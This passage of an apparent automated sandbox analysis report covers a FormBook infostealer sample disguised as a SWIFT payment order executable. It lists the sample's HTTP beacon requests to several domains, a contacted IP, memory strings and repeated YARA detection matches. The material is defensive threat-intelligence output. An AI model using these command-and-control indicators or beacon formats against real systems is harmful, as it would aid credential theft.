Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: global traffic, HTTP traffic detected: GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1 | Host: www.wamhsh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1 | Host: www.pyjama-france.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1 | Host: www.hpsaddlerock.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1 | Host: www.aarondecker.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 23.227.38.74
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 25 Nov 2021 16:31:46 GMT | Server: Apache | Content-Length: 260 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 61 6d 68 73 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.wamhsh.com Port 80</address></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 25 Nov 2021 16:31:51 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Sorting-Hat-PodId: 183 | X-Sorting-Hat-ShopId: 51998097592 | X-Request-ID: dbaee5ab-3952-40fa-97f1-8e4299a03f3a | X-Download-Options: noopen | X-Content-Type-Options: nosniff | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 1; mode=block | X-Dc: gcp-europe-west1 | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 6b3c4509ccd05b7a-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c | Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 16:31:56 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be761-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://help.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://news.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://shop.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://shop.gandi.net/en/domain/suggest?search=elderlycareacademy.com&amp;source=parking
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://shop.gandi.net/en/domain/transfer
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://whois.gandi.net/en/results?search=elderlycareacademy.com
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://www.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://www.gandi.net/en/cloud
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://www.gandi.net/en/domain
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://www.gandi.net/en/security
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp, String found in binary or memory: https://www.gandi.net/en/simple-hosting
Source: unknown, DNS traffic detected: queries for: www.innovativepropsolutions.com

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
